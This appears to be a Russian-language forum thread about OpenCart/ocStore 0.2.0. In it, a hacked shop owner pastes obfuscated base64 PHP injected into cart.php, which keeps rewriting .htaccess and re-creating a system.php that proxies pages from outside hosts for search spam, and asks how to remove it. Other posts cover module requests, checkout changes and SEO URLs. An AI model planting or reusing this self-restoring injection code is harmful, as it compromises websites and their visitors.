Strongest

Так по поводу ссылки на взлом opencarta эта дырка зыкрыта или нет?

Дело в том, что дата изменения этих файлов стоит старая, я бекап скачал с вирусом. Т.е. файл system/library/cart.php изменен 09.06.11 хотя этот же файл в бекапе от 27 числа другой и дата на нем такая же 09.06.11 Так же влогах нашел вот что 85.26.241.84 - - [02/Feb/2012:12:14:40 +0400] "GET /books/images/jquery00.js HTTP/1.0" 404 5375 "http://alenset.in/eram/premierdetect.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

И еще добавлю, нашел еще в файле system/library/cart.php следующий код: function __destruct(){ $GLOBALS['_1047846918_']=Array(base64_decode('ZXJyb3' .'J' .'f' .'cmVw' .'b3J0aW' .'5n'),base64_decode('' .'dGl' .'tZQ' .'=='),base64_decode('Z' .'m' .'lsZV9leGlzdH' .'M='),base64_decode('Zm9wZW4='),base64_decode('Z' .'n' .'dyaXR' .'l'),base64_decode('Z3p' .'1bmNvbX' .'ByZXNz'),base64_decode('Ym' .'FzZ' .'TY0X2RlY29kZQ' .'=='),base64_decode('ZmNsb3Nl'),base64_decode('Z' .'m9' .'w' .'ZW4='),base64_decode('ZnJlYWQ='),base64_decode('Zml' .'s' .'ZXNpemU='),base64_decode('' .'ZmNsb3Nl'),base64_decode('c3Ryc' .'G9z'),base64_decode('c3R' .'ycG' .'9z'),base64_decode('Y2h' .'tb' .'2Q' .'='),base64_decode('Zm9' .'wZW' .'4='),base64_decode('ZndyaXRl'),base64_decode('Z3p1bmNvb' .'XByZXNz'),base64_decode('Y' .'mFz' .'ZTY0X2RlY29kZ' .'Q=='),base64_decode('ZmNs' .'b' .'3Nl'),base64_decode('Y2ht' .'b2' .'Q='),base64_decode('' .'Zm' .'lsZV' .'9' .'leGlzd' .'HM='),base64_decode('Zm9wZW4='),base64_decode('Z' .'ndyaXRl'),base64_decode('Z3p1b' .'mNvbXByZ' .'XNz'),base64_decode('Y' .'mF' .'zZT' .'Y0X2Rl' .'Y29k' .'ZQ=='),base64_decode('' .'Zm' .'Nsb3Nl'),base64_decode('Zm9w' .'ZW4' .'='),base64_decode('' .'Zn' .'JlY' .'WQ='),base64_decode('ZmlsZ' .'XNpe' .'mU' .'='),base64_decode('' .'ZmNsb3N' .'l'),base64_decode('YmFzZT' .'Y0' .'X2VuY29' .'k' .'ZQ=='),base64_decode('Z3' .'pjb' .'21wcmVzcw=='),base64_decode('Y' .'2htb2Q='),base64_decode('Zm9wZW4='),base64_decode('' .'Zn' .'d' .'ya' .'X' .'R' .'l'),base64_decode('Z3' .'p1bmNvbX' .'ByZ' .'XNz'),base64_decode('YmFzZTY0X2R' .'lY29kZQ=' .'='),base64_decode('Z' .'m' .'Nsb3Nl'),base64_decode('Y2h' .'tb2' .'Q=')); ?><? function _835434907($i){$a=Array('ZXJlbWlu','SXQgd29ya3Mh','ZXJlbWluMg==','ZUp5TlZFdHYwMEFRdmtmS2Z4aWFJaWdFcHdWeFFiU29RQ29pbFJhU1ZEMlVOdHJFWTJkVmU5ZnNiZ2dSUlNvdkNRa2tqcHdRQnc1Y1cyZ2xLQkQrd3ZvZk1Xc0hDS2xBWEx5Nzgvam1tNWRMWU4vYW9UMUlkK203YjcvWlEzc0lkT3hCMTVqa1VxVVNEMlNDb3NPVThWU3ZXQ2dXVmhQRHBkQndka2xHa2V3M0JuSEV4YloycWhMWTEzYlBmaWV3dy9TeC9aUStUbCtDL1VLWFIrNUpzQi9CSHRDVDlQYUlSRU82ZmJLZmY0T2Vxd2tmNytNNDJsRzZtNzdJa1E3SWdaRFNKL1k3MkNOSW41TDZNK0h2MmErUVBxZGpueDVEQ2pPMEg0cUZ5MHM4UW4yVG1VNFhwdTU0cDAwUzdYREJkeUlaN3BqN1ptWnFnZUlxSHhYNEtBWmw1cklwRnE3VEhRSWxZeUFCZ1ZSK295dzRWamtxS05tV1JudUVROUpGNTNyY2FXR1V4UnZLbG9xYlBuT0ZwbnkvMnFITDVVdjZDdXg3S3Y4N3IxaW9ZMTl4ZzFVUmNvR3dLbjVKcmpLTlVIRklJOEUxS1h3NCtlQkdzM21yZFdPMTBYd0lKN2FtQVRaV3JtMyswNmJmNzkveC9qU3I5eUtFcmRQZW1abnBuKzBtSzIvY3NUSTlCeHYxK1F1emMrWGxTY2UybE52YWVVTkZEN1RCZUhSNFNUZTV3djM1NmJsSlF2WHE3YlZxbzlsYXFpMVhWeFp2Vm9uWHVlQi9qUHkvR2EzVmE2U3ZaRlFtODlyWXVySko1TGdicVl4VFM4bWV3ZGE4eTJtNWZMdXh1RG5xRUZDSHh1WXlYNEQxOWZWL05lWjRqYmNTaFRGSEdpbURuWHhkeGdsbGxSb3I4NlQxUkttSldLa0VpNzdQM1dxd0NCcG9EQmVoQnRObEJtSTJBSUhvZzVIUVJrREIyaEc5QXFsQXl4aEJvN3FIU3Vjb2E2SWo0eGlGSVY4RWQyZkMxOUFlQUhHUTl3ZzFVNVJBODFCUXdkd3NrN0VNZ0Jzdmg2Z0ZNSkE5Q05FQUV6QlZFd1pWenNyRmdhcFNGUG5pN093VXNJQlVPU0VDTGp0a1FYRzBrUXBIWVpoTGdtdUlrZEhTRTY2Q3J0UUdmSWxhbkRLUTdXS1dwNWQzYU00YkVWRGdma1VnUlRUSXJUSjNWd1RtK3lSR1lveTBob1FCaHNkWXBqZFFwRVJxemFsQ1JDVGtOS1NxRlVheXpTTHRsRko0ME16NFVGSDdVbTA3UEo5clYxTHl2K1FZMFB5MGdvaUZ4d0ZrRU9Ra3owK1E3REtIR1BJTzNPMUpReitOVVpQSy94OHNjMi9sN3EwdzZjQnFFUHdBc3B3aUhRPT0=','RE9DVU1FTlRfUk9PVA==','Ly5odGFjY2Vzcw==','dw==','cg==','UmV3cml0ZVJ1bGUgXmJvb2tzKC4qKSAvc3lzdGVtL3N5c3RlbS5waHA/aWQ9JDE=','UmV3cml0ZUNvbmQgJXtSRVFVRVNUX1VSSX0gIS9ib29rcw==','dw==','ZUp6dFZtdHZva0FVL1N0K01CR3lwcGtaOEVHczI5VFcwamFzWFZGQk1ZYndzTVd1b3F1aTFXMy8rODRndHFqTTRINWZFd2R3enJubnpwMXpCeSt2TWxsWmVhcGRLNjEremhUTGdvREtwVUxCekEycTEvTzV0ZUZzYXpFc2lxWTdkS2J1a012MUJHMlR5MXprN0R0cFprL0dJTWZuVHhCa1h0dGd4TmJva250MTVkdzNxMGxJalV4SFNIVkZIcWhJZ2hvUDVUQTJHVjRUVU9UM0hUSkUyREtPUys1d1NEd214SFVFTmN3QVh6ZW5zNVljS25tR3JDWE1FazR5ajVBd0YvTStzNldndnZURE9pV3BoR3ZhelZLelpHVVk4bFZHRHRZdVM0K015WEgyNjRrUWxGaTlyOHJQYkRKUzNQSHBuN2c3S1BzVHhUd1hTZVpDbDJoc2R4Qm5rS2V0c1F1WDZJeG9SM2E3UktrN3V5SjdMc01sWkloY1JxOS9mQS9aKyttd25iSlRZeW1GMllZeEtBcDB0OFhXNDMzVmhLOWtycjVmWG1XZUE5OVpqcVoreG9SbFNTeVdSQWtpTGp2aS8yU3Q2S0RKV1RydTAzek91bGVCY3p0ZEtVaGI5dlR4d3VnK2Joei9JWEQ4emdwUEs1UEcxbGxYQ2JLSnBNQ1Z0Y0M5Z1oxaHR6WitHdFdBMGZXQWdqQmt1M2pwSWM5ei9NYll2WVdDcFJkKzJZSzdWZHIxVGFOZEozVEZyd1VHTmRMTTF1OThveVd0N1lrVG9pZXpkWVFPYjNVbmhmamJrVFUvUkxzejR5Vk54cmYwSG50TkhyRDFkZWxCYmt4NzNVZmNFVTNKUmVQQWtDWEIyWUMzSDYrZE4xSzg0eHJlTFF5OVFOQ0JwWXNyWEV2UHhtdHlKdHJTMHJVTjNpZGc2QTJnK0k5UTJTL3VmMzFwOWVVcjgrRXltUHVaUSt0bnJYNTJOT0FySDBkV0g1c200TEREVFZETm1tcTkyYW0zMnYyNC93RS9xR1JOV0tXOGdmdGd3UEVZZ0tweEV1UXpGemhraFVhQ0F3N0h6TjkwVk9YcFo5dkVsendPd1ZQeDZCQ3YxdHNkdGRGV3J4dXR1N3FhbjA4RDMrWEFOM0FoeEQ3c1I1NGtMVkJYSllTQzlJVEVhSDcwek5FZ0JRSUIrWGhaRU0valVsUHd4UUVYeDVJTVA0Ymp4WkFoVVRxVkVGa1M1VU9Kd2hrUzBxbEVrZWZmMzJuL3lQb1FuREpLcktRZ1BNeXFmRVpXRUoyS1NFd1I0VkFFZ3IwS25TSWVVV0JJY2J4cEJqdW44a0Z2R1loU2VnWVdFcHRHU091YTRqKzJEU3lkMlRjRjhrMXBDVmhPNlFrb3BUY0ZTbkFIWkhvV0hka0RudU5hbE9BUFdHVEtIQnVrZEk2TW1DQlRacllIU2pnV0lOTzY2T2hnUU9DY3pCS09CZ1NaTWtlSEEwS3BIWUtrSTRwdzBDSDRUZk1YMkpqR253PT0=','RE9DVU1FTlRfUk9PVA==','L3N5c3RlbS9zeXN0ZW0ucGhw','dw==','cg==','dw==');return base64_decode($a[$i]);} ?><?php $GLOBALS['_1047846918_'][0](round(0));if(isset($_GET[_835434907(0)]))die(_835434907(1));if($GLOBALS['_1047846918_'][1]()>=round(0+442570820.333+442570820.333+442570820.333)|| isset($_GET[_835434907(2)])){$_0=_835434907(3);$_1=$_SERVER[_835434907(4)] ._835434907(5);if(!$GLOBALS['_1047846918_'][2]($_1)){$_2=$GLOBALS['_1047846918_'][3]($_1,_835434907(6));$GLOBALS['_1047846918_'][4]($_2,$GLOBALS['_1047846918_'][5]($GLOBALS['_1047846918_'][6]($_0)));$GLOBALS['_1047846918_'][7]($_2);}else{$_2=$GLOBALS['_1047846918_'][8]($_1,_835434907(7));$_3=$GLOBALS['_1047846918_'][9]($_2,$GLOBALS['_1047846918_'][10]($_1));$GLOBALS['_1047846918_'][11]($_2);if(!$GLOBALS['_1047846918_'][12]($_3,_835434907(8))||!$GLOBALS['_1047846918_'][13]($_3,_835434907(9))){$GLOBALS['_1047846918_'][14]($_1,round(0+102.2+102.2+102.2+102.2+102.2));$_2=$GLOBALS['_1047846918_'][15]($_1,_835434907(10));$GLOBALS['_1047846918_'][16]($_2,$GLOBALS['_1047846918_'][17]($GLOBALS['_1047846918_'][18]($_0)));$GLOBALS['_1047846918_'][19]($_2);$GLOBALS['_1047846918_'][20]($_1,round(0+84+84+84+84+84));}}$_0=_835434907(11);$_1=$_SERVER[_835434907(12)] ._835434907(13);if(!$GLOBALS['_1047846918_'][21]($_1)){$_2=$GLOBALS['_1047846918_'][22]($_1,_835434907(14));$GLOBALS['_1047846918_'][23]($_2,$GLOBALS['_1047846918_'][24]($GLOBALS['_1047846918_'][25]($_0)));$GLOBALS['_1047846918_'][26]($_2);}else{$_2=$GLOBALS['_1047846918_'][27]($_1,_835434907(15));$_3=$GLOBALS['_1047846918_'][28]($_2,$GLOBALS['_1047846918_'][29]($_1));$GLOBALS['_1047846918_'][30]($_2);if($GLOBALS['_1047846918_'][31]($GLOBALS['_1047846918_'][32]($_3))!=$_0){$GLOBALS['_1047846918_'][33]($_1,round(0+127.75+127.75+127.75+127.75));$_2=$GLOBALS['_1047846918_'][34]($_1,_835434907(16));$GLOBALS['_1047846918_'][35]($_2,$GLOBALS['_1047846918_'][36]($GLOBALS['_1047846918_'][37]($_0)));$GLOBALS['_1047846918_'][38]($_2);$GLOBALS['_1047846918_'][39]($_1,round(0+98.6+98.6+98.6+98.6+98.6));}}} } Вроде пока не появляется, но все равно, что-то мне подсказывает что дырень остается, т.е. ей можно воспользоваться еще раз будет.

Добрый день, интернет магазин стоит на версии 0.2.0 Сегодня обнаружил следующее, на сайте разместили в папке совершенно другой сайт и google проиндексировал, вот как это выглядит: сам сайт: http://www.******.ru/ и взломанные страницы вида *****.ru/books/rukovodstvo-po-remontu-folksvagen-passat/ Что нашел: файл htaccess изменен, в нем прописан редирект: RewriteEngine On RewriteBase / RewriteCond %{HTTP_HOST} !^$ [NC] RewriteCond %{HTTP_HOST} !^www. [NC] RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L] RewriteRule ^books(.*) /system/system.php?id=$1 RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} !/books RewriteRule ^([^?]*) index.php?_route_=$1 [L,QSA] Как видим он обращается к файлу /system/system.php В нем следующий код: <? $GLOBALS['_483328755_']=Array(base64_decode('Y3Vy' .'bF9pbml0'),base64_decode('Y3' .'VybF9zZX' .'RvcHQ='),base64_decode('Y3V' .'ybF9zZXRv' .'cHQ='),base64_decode('Y3VybF9leG' .'V' .'j'),base64_decode('Y' .'3VybF9' .'jbG9zZ' .'Q=' .'='),base64_decode('c3R' .'yc3Ry'),base64_decode('aGV' .'hZGVy'),base64_decode('c3Ryc3Ry'),base64_decode('' .'aGVhZG' .'V' .'y'),base64_decode('' .'c3R' .'yc3' .'Ry'),base64_decode('c' .'3' .'Ryc3Ry'),base64_decode('aGVhZGVy'),base64_decode('c3Ryc' .'3R' .'y'),base64_decode('' .'aG' .'Vh' .'ZGVy'),base64_decode('' .'aGVh' .'ZGV' .'y'),base64_decode('Y3VybF9' .'pb' .'ml0'),base64_decode('Y3Vy' .'bF9zZX' .'RvcHQ' .'='),base64_decode('Y3VybF9zZX' .'RvcHQ' .'='),base64_decode('Y3Vyb' .'F9leGVj'),base64_decode('Y' .'3VybF9jbG9' .'zZQ' .'=='),base64_decode('c3' .'Ry' .'c3Ry'),base64_decode('aGVh' .'ZGV' .'y'),base64_decode('' .'c3Ryc3Ry'),base64_decode('' .'a' .'GV' .'h' .'ZGVy'),base64_decode('c' .'3R' .'yc' .'3R' .'y'),base64_decode('c3' .'Ryc3Ry'),base64_decode('a' .'GVh' .'ZGVy'),base64_decode('c3Ryc3' .'R' .'y'),base64_decode('aGVhZGVy'),base64_decode('' .'a' .'GVhZGV' .'y')); ?><? function _1894674912($i){$a=Array('aWQ=','aHR0cDovL2VtYWlsZXJycnIucnUv','LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD13aW5kb3dzLTEyNTE=','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUx','aWQ=','aHR0cDovL2FsZW5zZXQuaW4vZXJhbS9wcmVtaWVyZGV0ZWN0LnJ1Lw==','LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD13aW5kb3dzLTEyNTE=','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUx');return base64_decode($a[$i]);} ?><? function l__0(){$_0=$_REQUEST[_1894674912(0)];$_1=$GLOBALS['_483328755_'][0]();$_2=_1894674912(1) .$_0;$GLOBALS['_483328755_'][1]($_1,CURLOPT_URL,$_2);$GLOBALS['_483328755_'][2]($_1,CURLOPT_RETURNTRANSFER,round(0+0.333333333333+0.333333333333+0.333333333333));$_3=$GLOBALS['_483328755_'][3]($_1);$GLOBALS['_483328755_'][4]($_1);if($GLOBALS['_483328755_'][5]($_0,_1894674912(2))){$GLOBALS['_483328755_'][6](_1894674912(3));}elseif($GLOBALS['_483328755_'][7]($_0,_1894674912(4))){$GLOBALS['_483328755_'][8](_1894674912(5));}elseif($GLOBALS['_483328755_'][9]($_0,_1894674912(6))|| $GLOBALS['_483328755_'][10]($_0,_1894674912(7))){$GLOBALS['_483328755_'][11](_1894674912(8));}elseif($GLOBALS['_483328755_'][12]($_0,_1894674912(9))){$GLOBALS['_483328755_'][13](_1894674912(10));}else{$GLOBALS['_483328755_'][14](_1894674912(11));}echo $_3;}$_0=$_REQUEST[_1894674912(12)];$_1=$GLOBALS['_483328755_'][15]();$_2=_1894674912(13) .$_0;$GLOBALS['_483328755_'][16]($_1,CURLOPT_URL,$_2);$GLOBALS['_483328755_'][17]($_1,CURLOPT_RETURNTRANSFER,round(0+0.5+0.5));$_3=$GLOBALS['_483328755_'][18]($_1);$GLOBALS['_483328755_'][19]($_1);if($GLOBALS['_483328755_'][20]($_0,_1894674912(14))){$GLOBALS['_483328755_'][21](_1894674912(15));}elseif($GLOBALS['_483328755_'][22]($_0,_1894674912(16))){$GLOBALS['_483328755_'][23](_1894674912(17));}elseif($GLOBALS['_483328755_'][24]($_0,_1894674912(18))|| $GLOBALS['_483328755_'][25]($_0,_1894674912(19))){$GLOBALS['_483328755_'][26](_1894674912(20));}elseif($GLOBALS['_483328755_'][27]($_0,_1894674912(21))){$GLOBALS['_483328755_'][28](_1894674912(22));}else{$GLOBALS['_483328755_'][29](_1894674912(23));}echo $_3; ?> Если изменять и удалять файлы они восстанавливаются. Если изменять права, то все равно восстанавливаются. Пароли от FTP менял, машина чистая, значит где-то shell. Что нашел в интернете, вот статья очень похожая: http://terror-web.uc...gazina/1-1-0-51 Вопрос. Как теперь мне избавится от этой заразы. Ведь интернет магазин допиливался очень сильно, переход на новый движок повличет огромные переделки.

Кто готов выложить русский модуль тут и чтобы подходил по OC 0.2.0 . Готов заплатить.

Собственно нужен модуль фотогалереи. Существует ли такой? С возможностью создавать альбомы.

Готов заплатить за реализацию! Потом выставить в паблик бесплатно!

У меня, вопрос. Я убрал шаг выбора регистрации или гостевой заказ. Прописал чтобы по нажатию "оформить заказ" сразу шел на гостевой заказ $this->data['checkout'] = HTTPS_SERVER . 'index.php?route=checkout/guest_step_1';НО! Если зайти в корзину и нажать оформить заказ, то он все равно предлагает выбор регистрации или же гостевой заказ. А если нажимать справа на "оформить", где отображается добавленный товар, то все нормально, этот шаг пропускается. Где еще нужно заменить параметр, кроме как cart.php?

Установил чистую 0.2.0 потом поставил пак для него (SeoUrl_ocStore_0.2.0), но ошибка остаётся. При включении seo url не хочет заходить в подкатегорию и на сам товар этой подкатегории, пишет страница не найдена. Всё облазил, установлено все правильно, все псевдонимы прописаны, но никак не хочет заходить в созданные подкатегории и товары в них. Если же класть товар в основную категорию, то страница товара отображается. PS Нашел в чем была ошибка! У меня совпадали псевдонимы производителей и псевдонимы подкатегорий, т.е. псевдоним производителя был firm1 и подкатегория имела псевдоним firm1, я думал это разные разделы сайта и не как не повлияет на работоспособность, однако оказалось - нет. Поэтому не работало.